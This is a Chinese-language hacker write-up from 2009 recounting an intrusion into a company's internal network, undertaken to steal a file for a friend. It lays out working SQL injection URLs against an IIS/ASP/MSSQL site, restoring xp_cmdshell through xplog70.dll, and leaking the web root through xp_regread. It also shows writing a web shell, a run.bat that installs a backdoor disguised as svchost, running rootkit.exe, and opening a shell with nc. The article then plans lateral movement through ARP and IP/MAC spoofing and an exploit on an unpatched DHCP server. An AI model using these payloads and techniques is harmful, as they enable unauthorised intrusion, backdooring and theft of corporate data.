渗透国内某知名公司内部局域网经过来源:未知时间:2009-08-06 13:25 编辑:菇在江湖本文的目标是一国内知名公司的网络，本文图片、文字都经过处理，均为伪造，如有雷同，纯属巧合。

最近一个网友要我帮他拿他们公司内网一项重要的文件，公司网络信息朋友都mail给我了，这些信息主要是几张网络拓扑图以及在内网嗅探到的信息（包括朋友所在的子网的设备用户名及密码等信息……）。

参照以上信息总体整理了一下入侵的思路，如果在朋友机器安装木马，从内部连接我得到一个CMD Shell，须要精心伪装一些信息还有可能给朋友带来麻烦，所以选择在该网络的网站为突破口，而且管理员不会认为有“内鬼”的存在。

用代理上肉鸡，整体扫描了一下他的网站，只开了80端口，没扫描出来什么有用的信息，就算有也被外层设备把信息过滤掉了，网站很大整体是静态的网页，搜索一下，查看源文件->查找->.asp。

很快找到一个类似http://www.*****.com/news/show1.asp?NewsId=125272页面，在后面加上and 1=1 、and 1=2前者正常，后者反回如下错误。

Microsoft OLE DB Provider for ODBC Driver error '80040e14'[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character sting”./news/show/show1.asp，行59是IIS+MSSQL+ASP的站，在来提交：http://www.*****.com/news/show1.asp?NewsId=125272 and 1=(selectis_srvrolemember('sysadmin'))http://www.*****.com/news/show1.asp?NewsId=125272 and 'sa'=(select system_user) 结果全部正常，正常是说明是当前连接的账号是以最高权限的SA运行的，看一下经典的“sp_cmdshell”扩展存储是否存在，如果存在那就是初战告捷。

http://www.*****.com/news/show1.asp?NewsId=125272 and 1=(select count(*) from master.dbo.sysobjects where xtype = …x‟ and name = 'xp_cmdshell')失败，看看是否可以利用xplog70.dll恢复，在提交：http://www.*****.com/news/show1.asp?NewsId=125272;execmaster.dbo.sp_addextendedproc 'xp_cmdshel l',‟xplog70.dll‟在试一下xp_cmdshell是否恢复了，又失败了，看样管理是把xp_cmdshell和xplog70.dll删除了，想利用xp_cmdshell“下载”我们的木马现在是不可能的。

首先我们先要得到一个WEB Shell，上传xplog70.dll，恢复xp_cmdshell在利用xp_cmdshell运行我们上传的木马，这都是大众入侵思路了，前辈们以经无数人用这个方法入侵成功。

拿出NBSI扫一下，一会后台用户名和密码是出来了，可是后台登录地址扫不出来，测试了N个工具、手工测试也没结果，有可能管理员把后台删除了。

我们想办法得到网站的目录，这时就须要用到xp_regread、sp_makewebtask两个扩展存储，试一下是否存在：http://www.*****.com/news/show1.asp?NewsId=125272and 1=(select count(*) from master.dbo.sysobjects where name = 'xp_regread')http://www.*****.com/news/show1.asp?NewsId=125272and 1=(select count(*) frommaster.dbo.sysobjects where xtype='X' and name = 'sp_makewebtask')全部返回正常说明存在(一般的网管不太了解他们，存在也很正常)，首先简单介绍一下xp_regread扩展存储过程及sp_makewebtask Web助手存储过程，xp_regread是用来读取注册表信息的，我们可以通过这个来得到保存在注册表中的Web绝对路径。

sp_makewebtask这个就是我们用来得到WEB Shell的，主要功能就是导出数据库中表的记录为文件。

这个方法网上很早就出现了，我们网站的目录在注册表里是在HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\，我们在数据库里建一个表，将他存储在表里，在使数据库错误回显在IE里。

http://www.*****.com/news/show1.asp?NewsId=125272;create table[dbo].[biao]([zhi][char](255));这时候我们就建了一个名为biao的表，并添加了一个类型为char长度是255的字段，名为zhi，然后添加数据：http://www.*****.com/news/show1.asp?NewsId=125272;declare @result varchar(255) execmaster.dbo.xpregread'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\ Parameters\Virtual Roots','/', @result output insert into biao (zhi) values(@result);--然后暴出WEB绝对路径：http://www.*****.com/news/show1.asp?NewsId=125272 and 1=(select count(*) from biao where zhi>1)IE返回错误，得到网站的物理路径e:\inetput\web\，向网站目标写个小网页木马，一个朋友以前写过一个程序，由于只是内部用的，我就不抓图了，网上早就有发布过这种工具，有兴趣下载自己看看吧！原理都是一样的，如果想手工输入就是麻烦了点，但可以向网站脚本文件写入“一句话木马”在远程提交，以得到一个大马的目的。

登录木马后把自己机器的xplog70.dll上传到网站目录在传一个hacker's door，黑客之门只有一个dll，我们要建一个批处理，名子为run.bat：@echo off@rundll32 kernel,DllRegisterServer svchost.exe@del run.bat在拿一下文件合并器，将我们建的批处理和dll文件合并成一个exe文件，黑客之门的使用方法我就不多说了，他有详细的使用手册，建议在处理一下，以免传到服务器上被查杀。

黑客之门主要用处是可以利用服务器上所开的任何端口和我通信，现在恢复他的xp_cmdshell 扩展存储：http://www.*****.com/news/show1.asp?NewsId=125272;execmaster.dbo.sp_addextendedproc 'xp_cmdshell',‟e:\inetput\web\xplog70.dll‟;--在IE里提交：exec master.dbo.xp_cmdshell‟ e:\inetput\web\rootkit.exe‟ rootkit.exe是黑客之门改的名子，注意这个程序要解绑到系统目录如图1。

木马运行后，Nc –vv ip 80 输入密码就得到一个CMD Shell，在放一个隐藏的asp木马，简单的把入侵的痕迹清理一下。

以上的方法很早就有了，由于网上资料也很多、本文主要说渗透内网，篇幅有限我就不过多解释了。

渗透内网这个网络很大共有七个网管，现在当前位置是F网、朋友在B网、目标在A网。

朋友给的资料，目前接入internet的两台设备未知(假设未知的设备都是路由器)，图2是该公司大体的网络拓扑图。

掌握B网所有设备用户名密码（朋友之前嗅探到的）。

除A网其它网络可以自由通信，A网内有公司重要信息所以不像其它网，它是不允许任何人访问的，路由不给予转发数据，也就是只进不出的网络，虽然现在的网络是外紧内松，但是想进入目标主机还是有些难度。

怎么跨过设备的限制到达目标呢！您还要向下看。

现在首要的目的就是让router3给我们转发数据包。

首先尝试telnet登录路由，拒绝访问不能登录，我想也不能登录，应该是访问控制列表限制了。

现在我们首要目标拿下router3的控制权，为什么目标定位在router3呢！我们现在知道他的登录密码；我当前位置可以和B网直接通信；Router3是A、B网络公用的，应该两个网管都有权限登录；这一点也是最重要的，只有router3给予数据转发才可以和目标主机通信；个人认为router3是最佳路线，现在假设一下，如果B网管理员所管理的设备只有他本身所用的IP或TFTP Server（兼DHCP Server）才可以登录设置，那么有如下思路可以完成入侵。

一般来说管理员主机一定可以登录这台路由器的，网管主机都不可以登录设备那么谁为维护网络呢！1、直接得到B网管理员主机的一个CMD Shell来登录设备。

2、得到管理员同网段一台主机的CMD Shell，从而利用ARP欺骗来telnet目标路由。

3、得到B网其它网段中可访问外部网络一台主机的CDM Shell，伪装CDM Shell主机IP地址，必要情况伪装IP+MAC地址来欺骗路由器，（机会高达到50%）。

经过分析拿B网的DHCP服务器（172.16.101.25）开始，选择突破点也是很重要的，DHCP 服务器为了提供这个网段的服务他是暴露在相对外部的，而且不在VLAN的管辖中，还和网管在同一交换机下，而且听朋友说他们公司PC几乎不打补丁，还有很多员工不知补丁为何物，这也给入侵带来及大的方便。

利用服务器的WEB木马上传一些流行的溢出程序，直接（最后才知道2003年的溢出程序对这个主机都有用）拿个溢出程序溢出他的DHCP服务器，成功得到一个System权限的CMD Shell。